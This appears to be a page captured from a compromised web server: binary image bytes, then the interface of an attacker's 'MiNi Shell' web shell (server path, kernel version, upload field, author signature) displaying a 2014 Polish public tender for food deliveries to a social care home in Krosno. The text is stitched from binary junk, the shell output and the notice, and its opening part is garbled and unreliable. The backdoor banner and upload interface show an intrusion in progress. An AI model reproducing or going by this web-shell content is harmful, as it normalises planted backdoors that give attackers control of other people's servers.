JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140206/43590-N-2014.html

<p class="kh_header"><b>Krosno: Zakup i sukcesywne dostawy artykułów spożywczych w okresie od 01 kwietnia 2014r. do 30 czerwca 2014r.</b><br>
<b>Numer ogłoszenia: 43590 - 2014; data zamieszczenia: 06.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej nr 2 w Krośnie , ul. Kletówki 7, 38-400 Krosno, woj. podkarpackie, tel. 13 43 219 10, faks 13 43 219 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpskrosno.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.dpskrosno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i sukcesywne dostawy artykułów spożywczych w okresie od 01 kwietnia 2014r. do 30 czerwca 2014r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy artykułów spożywczych w miarę zgłaszanych potrzeb do Domu Pomocy Społecznej w nr 2 w Krośnie, zgodnie z wymaganiami określonymi w SIWZ z podziałem na 7 części: 
Część 1. Dostawa  artykułów ogólnospożywczych - wg załącznika nr 4 do SIWZ, 
Część 2. Dostawa mięso i wędliny - wg załącznika nr 5 do SIWZ, 
Część 3. Dostawa pieczywo, wyroby cukiernicze  - wg załącznika nr 6 do SIWZ, 
Część 4. Dostawa artykuły nabiałowe - wg załącznika nr 7 do SIWZ, 
Część 5. Dostawa warzywa i owoce - wg załącznika nr 8 do SIWZ, 
Część 6. Dostawa mrożonki - wg załącznika nr 9 do SIWZ,
Część 7. Dostawa zupy, sosy, przyprawy - wg załącznika nr 10 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca przedłoży stosowne oświadczenie - wzór oświadczenia stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca przedłoży stosowne oświadczenie - wzór oświadczenia stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca przedłoży stosowne oświadczenie - wzór oświadczenia stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca przedłoży stosowne oświadczenie - wzór oświadczenia stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca przedłoży stosowne oświadczenie - wzór oświadczenia stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy o spełnienie warunków udziału w postępowaniu o udzielenie zamówienia określonych w art. 22 ust. 1 ustawy  - załącznik nr  1 do SIWZ.
2. Oświadczenie Wykonawcy o braku podstaw do wykluczenia w postępowaniu o udzielenie zamówienia określonych w art. 24 pkt 1 i 2  ustawy - załącznik nr  2  do SIWZ. 
3. Formularz oferty - załącznik nr 3 do SIWZ. 
4. Część zamówienia:
- załącznik nr 4 do SIWZ,
- załącznik nr 5 do SIWZ,
- załącznik nr 6 do SIWZ,
- załącznik nr 7 do SIWZ,
- załącznik nr 8 do SIWZ,
- załącznik nr 9 do SIWZ,
- załącznik nr 10 do SIWZ
5. Wzór umowy - załącznik nr 11  do SIWZ.
6. Pełnomocnictwo. 

W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wykonawcy (konsorcjum, spółka cywilna) dokument wymieniony w pkt 6 składa każdy z wykonawców. Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, została wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Projekt umowy stanowi załącznik nr 11 do SIWZ.
Zamawiający oprócz wypadków wymienionych w przepisach Kodeksu Cywilnego regulujących umowne prawo odstąpienie od umowy przewiduje także możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następującym zakresie:
1. Termin realizacji zamówienia może ulec zmianie  w następujących sytuacjach:
a) w przypadku opóźnienia Zamawiającego w rozstrzygnięciu przetargu i/lub podpisanie umowy,
b) w przypadku zawieszenia usług przez Zamawiającego.
2. Wynagrodzenie Wykonawcy określone w umowie może ulec zmianom w następujących przypadkach:
a) zmiana stawki urzędowej podatku VAT,
b) rezygnacji z części zamówienia, jeżeli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy lub której wykonanie nie będzie konieczne lub będzie bezcelowe w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy- o wartość niewykonanych dostaw.
3. Warunki zmian:
a) inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
b) uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych usług,
c) forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpskrosno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej nr 2 w Krośnie, 38-400 Krosno, ul. Kletówki 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2014 godzina 08:00, miejsce: Dom Pomocy Społecznej nr 2 w Krośnie, 38-400 Krosno, ul. Kletówki 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły Ogólnospożywcze załącznik nr 4 do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dżem niskosłodzony do 280 g.	 50 szt,
Marmolada do 1000 g. 10 szt,
Miód naturalny do 1000 g. 20 szt,
Koncentrat pomidorowy 30% do 500 g. 50 szt,
Produkty zbożowe (kasza jęczm., manna, kukurydz., gryczana) do 1 kg	45 kg,
Cukier kryształ do 1 kg 200 kg,
Cukier wanilinowy	40 szt,
Cukier puder 3 kg,
Mąka pszenna do 1 kg  150 kg,
Mąka ziemniaczana do 1 kg  5 kg,
Płatki jęczmienne do 500 g. 5 kg,
Płatki owsiane do 500 g. 5 kg,
Płatki kukurydziane do 1 kg  5 kg,
Herbata granulowana do 100 g. 90 szt,
Kawa zbożowa do 500 g. 5 szt,
Kakao ciemne do 200 g.	 5 szt,
Bułka tarta do 1 kg 10 kg,
Olej uniwesalny 60 szt,
Oliwa z oliwek 2 szt,
Majonez do 1 kg	30 szt,
Ketchup do 500 g. 20 szt,
Musztarda do 200 g. 10 szt,
Ocet	2 szt,
Sok wysokosłodzony do 500 ml  6 szt,
Sok przecierowy owoc.-warz. 0,33 l  250 szt,
Makaron (różne formy) do 1 kg  100 szt,
Sól do 1 kg	30 kg, Ryż do 1 kg  50 kg,
Ryba wędzona 6 kg,
Filet śledziowy marynowany w oleju do 5 kg 7 kg,
Koreczki śledziowe do 5 kg 7 kg,
Tuńczyk puszka  10 szt,
Filet śledziowy w oleju / sosie pomidorowym (konserwa) 130 g. 60 szt,
Drożdże świeże 0,5 kg,
Żelatyna spożywcza 50 g  10 szt,
Żurek w butelce	10 szt,
Kukurydza konserwowa do 400 g. 10 szt,
Groszek konserwowy do 400 g.  20 szt,
Ogórki konserwowy 15 szt,
Papryka konserwowa 10 szt,
Pieczarki marynowane 5 szt,
Chrzan (słoik) do 300 g.	10 szt,
Ciastka 5 kg,
Paluszki do 100 g. 40 szt,
Herbatniki do 50 g. 100 szt,
Chrupki kukurydziane 80 szt,
Proszek do pieczenia 10 szt,
Kwasek cytrynowy 20 szt,

Wyszczególnione ilości asortymentów w poszczególnych pozycjach są ilościami orentacyjnymi, które mogą ulec zmianie w trakcie trwania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mięso i wędliny załącznik nr 5 do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kiełbasa wiejska	7 kg,
Kiełbasa żywiecka	 3 kg,
Kiełbasa zwyczajna 15 kg,
Kiełbasa szynkowa 8 kg,
Kiełbasa krakowska 5 kg,
Kiełbasa biała 5 kg,
Kiełbasa wiejska drobiowa 15 kg,
Kiełbasa lenczowa	 5 kg,
Mortadela 20 kg,
Szynka drobiowa 10 kg,
Szynka wieprzowa 20 kg,
Szynka konserwowa 5 kg,
Polędwica wieprzowa sopocka	 5 kg,
Polędwica drobiowa 3 kg,
Schab pieczony 7 kg,
Baleron 3 kg,
Klops	7 kg,
Boczek (wędzony, gotowany)	10 kg,
Salceson drobiowy 5 kg,
Salceson wieprzowy 5 kg,
Pasztet pieczony	10 kg,
Pasztetowa (drobiowa, wieprzowa)	10 kg,
Parówki (drobiowe, wieprzowe, cielęce)	40 kg,
Serdelki 10 kg,
Kaszanka wiejska	20 kg,
Schab b/z kości 40 kg,
Karkówka 60 kg,
Szynka b/z kości	30 kg,
Łopatka b/z kości	50 kg,
Mięso gulaszowe (wołowe, wieprzowe, drobiowe) 30 kg,
Żeberka 15 kg,
Filet drobiowy 50 kg,
Udka	90 kg,
Porcja rosołowa 70 kg,
Kości	10 kg,
Kęski drobiowe 10 kg,
Wątroba drobiowa 30 kg,
Żołądki drobiowe	10 kg,
Flaki (wieprzowe, wołowe) 12 kg,
Smalec 3 kg,
Słonina 1 kg,

Wyszczególnione ilości asortymentów w poszczególnych pozycjach są ilościami orentacyjnymi, które mogą ulec zmianie w trakcie trwania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pieczywo, wyroby cukiernicze załącznik nr 6 do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb mieszany 0,6 kg	600 kg,
Chleb wieloziarnisty 0,7 kg	9 kg,
Chleb ze słonecznikiem	8 kg,
Chleb orkiszowy	7 kg,
Chleb żytni	7 kg,
Bułka zwykła 100 g. 250 kg,
Bułka grahamka 100 g. 12 kg,
Drożdżówki różne	120 szt,
Chałka 20 kg,
Ciastka kruche z marmoladą 5 kg,

Wyszczególnione ilości asortymentów w poszczególnych pozycjach są ilościami orentacyjnymi, które mogą ulec zmianie w trakcie trwania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Artykuły nabiałowe załącznik nr 7 do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko 2% 1700 l,
Śmietana 18% 135 l,
Ser biały półtłusty	 180 kg,
Ser żółty 20 kg,
Ser topiony 100 g. 11 kg,
Serek twarogowy 100 g. 150 szt,
Serek homogenizowany owocowy 125 g. 160 szt,
Masło (kostka) 120 kg,
Margaryna mleczna (kostka 250 g.)	2,5 kg, 
Kefir - kubek 400 ml 40 l,
Jogurt owocowy 150 g.	80 szt,
Jogurt owocowy b/c 250 g. 80 szt,
Jogurt naturalny 250g 30 szt,
Maślanka 1l	72 l

Wyszczególnione ilości asortymentów w poszczególnych pozycjach są ilościami orentacyjnymi, które mogą ulec zmianie w trakcie trwania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Warzywa i owoce załącznik nr 8 do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Marchew 240 kg,
Pietruszka 75 kg,
Seler	60 kg,
Cebula 60 kg,
Buraki ćwikłowe 100 kg,
Kapusta biała 100 kg,
Kapusta czerwona 10 kg,
Kapusta pekińska	15 szt,
Brukselka 10 kg,
Kalafior 15 szt,
Brokuł	 15 szt,
Fasolka szparagowa 10 kg,
Kalarepa 20 szt,
Sałata zielona 40 szt,
Cukinia 10 kg,
Pomidor 70 kg,
Ogórek świeży 50 kg,
Papryka świeża 10 kg,
Por 30 szt,
Botwina 10 szt,
Pietruszka zielona	150 szt,
Koper	100 szt,
Szczypior 110 szt,
Rzodkiewka	30 szt,
Biała rzodkiew 15 kg,
Kapusta kiszona do 1 kg 50 kg,
Ogórek kiszony do 400 g. 20 kg,
Fasola + groch 15 kg,
Czosnek 30 szt,
Pieczarka świeża 12 kg,
Jabłka 250 kg,
Gruszka 40 kg,
Banany 50 kg,
Pamarańcze	 30 kg,
Mandarynka	 30 kg,
Cytryna 5 kg,
Czereśnie 15 kg,
Morela 15 kg,
Brzoskwinia	15 kg,
Nektarynka	15 kg,
Śliwka 40 kg,
Rabarbar 10 kg,
Truskawka	25 kg,
Owoc jagody (borówka)	10 kg,
Wiśnia 5 kg,
Kiwi 120 szt,
Winogrono 25 kg,
Arbuz	30 kg,
Jaja 1500 szt,
Ziemniaki 1500 kg,
Grzyby suszone 1 kg,
Owoce suszone (jabłko, gruszka, śliwa) 15 kg,

Wyszczególnione ilości asortymentów w poszczególnych pozycjach są ilościami orentacyjnymi, które mogą ulec zmianie w trakcie trwania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mrożonki załącznik nr 9 do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mieszanka owocowa 30 kg,
Mieszanka warzywna 30 kg,
Truskawka 10 kg,
Czarna porzeczka	5 kg,
Brokuł	 7 kg,
Kalafior 7 kg,
Ryba - dorsz filet szater pak tafla	45 kg,

Wyszczególnione ilości asortymentów w poszczególnych pozycjach są ilościami orentacyjnymi, które mogą ulec zmianie w trakcie trwania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zupy, sosy, przyprawy załącznik nr 10 do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Barszcz biały 2 kg,
Żur 2 kg,
Sos sałatkowy 1 kg,
Galaretka owoc.	3 kg,
Kisiel	5 kg,
Budyń 4 kg,
Jarzynka 5 kg,
Przyprawa w płynie do zup, sosów	36 kg,
Przyprawa do mięs 0,5 kg,
Przyprawa do ryb	0,3 kg,
Pieprz czarny miel. 15 szt,
Pieprz ziołowy 20 szt,
Papryka w proszku 10 szt,
Ziele angielskie 10 szt,
Liść laurowy 10 szt,
Majeranek	10 szt,
Kminek 30 szt,

Wyszczególnione ilości asortymentów w poszczególnych pozycjach są ilościami orentacyjnymi, które mogą ulec zmianie w trakcie trwania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com